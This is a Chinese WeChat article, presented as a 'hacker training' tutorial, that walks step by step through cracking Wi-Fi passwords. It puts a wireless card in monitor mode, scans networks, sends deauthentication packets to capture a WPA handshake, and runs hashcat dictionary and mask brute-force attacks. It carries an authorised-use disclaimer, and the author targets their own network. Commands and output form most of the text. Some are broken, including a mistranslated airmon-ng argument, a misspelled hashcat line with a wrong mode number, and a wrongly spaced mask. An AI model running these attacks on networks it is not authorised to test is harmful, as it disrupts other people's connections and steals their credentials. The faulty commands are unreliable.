黑客养成计划之HASHCAT破解Wifi

郑重提示：

    本公众号所有教程仅用于技术交流和学习，仅可用于授权环境和个人环境，严禁用于任何未授权的恶意行为，尊重法律尊重隐私。

         Hashcat 是一款功能强大的密码恢复工具，Hashcat 也是少数可以与 GPU 配合使用的工具之一，并提供多种从哈希值中查找密码的方法。可以帮助我们恢复丢失或忘记的各种平台的密码，包括 Windows、Linux 和 macOS。解析来，我们看一看如何使用 Hashcat 破解 WiFi 密码。

         破解哈希值的最简单方法是首先尝试猜测密码。字典和暴力攻击是猜测密码的最常见方法。这些技术利用包含单词、短语、常用密码和其他可能用作密码的字符串的文件（例如社工库）。

启用监控模式

首先，您需要使用以下命令将无线卡置于监控模式。

airmon-ng 启动 wlan0

可以使用“iwconfig”命令查找无线接口名称，这里我们默认是0。

发现目标

使用以下命令开始扫描附近的无线网络。

airodump-ng wlan0

CH  6][ BAT: 3 hours 9 mins ][ Elapsed: 8 s ][ 2022-05-20 11:10                                          
                                                                                                                                              
 BSSID （用*代替）             PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                                                                                                                                                 #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                                                                                                                                                
*  -29       19        1    0   6  54e  WPA2 CCMP   PSK  xiaomi-SDXSEDSSD                            
*  -42       17        0    0   6  54e  WPA2 CCMP   PSK  Potian
*  -29       19        1    0   1 54e   WPA2 CCMP   PSK  TP-LINK                         
*  -42       17        0    0   11 54e  WPA2 CCMP   PSK  2403-5G                                                                                                                                                             

BSSID              STATION            PWR   Rate    Lost  Packets  Probes                                                                                                                                                                                     

*  *  -57    0 - 1      0        1  

这会显示范围内所有 Wi-Fi 路由器的数据表。

出于本演示的目的，我将选择破解我的网络“Potian”（破天）的密码，打开另一个终端并输入来自网络的接入点 MAC 地址 (BSSID) 和通道：

airodump-ng --bssid *（使用自己扫描到的BSSID即可） -c 6 --write wpa-01 wlan0

— write wpa-01是写入数据的文件名，也是存储 4 次握手的文件名。

您可以使用“ls”命令查看该文件，稍后您需要将其转换为不同的格式才能破解密码。

捕获 WPA/WPA2 握手

WPA/WPA2 使用 4 次握手来验证网络设备的身份，从而您可以在此过程中获取四次握手。打开另一个终端并输入：

aireplay-ng -0 100 -a * -c * wlan0

-0表示取消验证。

100是解除认证数据包的数量。

-a是接入点的 MAC 地址。

-c是要解除身份验证的客户端的 MAC 地址

 CH  6][ Elapsed: 4 s ][ 2014-03-24 17:51 ][ WPA handshake: *
“WPA handshake：*”代表成功捕获

将 .cap 文件转换为 .hccap 格式

在破解密码之前，您需要将.cap文件（wpa-01.cap）转换为hashcat文件格式.hc22000。通过将 .cap 文件上传到https://hashcat.net/cap2hashcat并将其转换为 .hc22000 格式

破解 WPA/WPA2 握手

Hashcat 两种最常见的攻击：

• 字典攻击

• 蛮力攻击

字典攻击

除了 hashcat 之外，您还需要一个单词表，根据习惯和个人讲演，包含常用密码的列表，使用以下命令开始破解过程：

hashcat –m 22000 wpa-01.hc22000 password.txt

暴力攻击

  暴力攻击基于尝试每种可能的组合，随着密码长度的增加，这会导致大量可能的组合，以下命令：

haschcat –m 2200 –a 3 wpa-01.hc22000 ?l ?l ?l ?l ?l ?l ?l ?l ?l ?l

-a 3表示您正在使用暴力攻击模式。

wpa-01.hc22000 = 是转换后的.cap 文件。

?l ?l ?l ?l ?l ?l ?l ?l ?l ?l = 这是您的掩码，其中 l = 小写字母。这意味着密码全部为小写字母。

Hashcat 可以使用以下内置字符集：

?l = abcdefghijklmnopqrstuvwxyz
?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
?d = 0123456789
?h = 0123456789abcdef
?H = 0123456789ABCDEF
?s = «space»!"#$%&'()*+,-./:;<=>?@[]^_`{|}~

假设您的密码是potian12。您可以使用自定义掩码：

 ?l?l?l?l?l?l?d?d

原文始发于微信公众号（KK安全说）：黑客养成计划之HASHCAT破解Wifi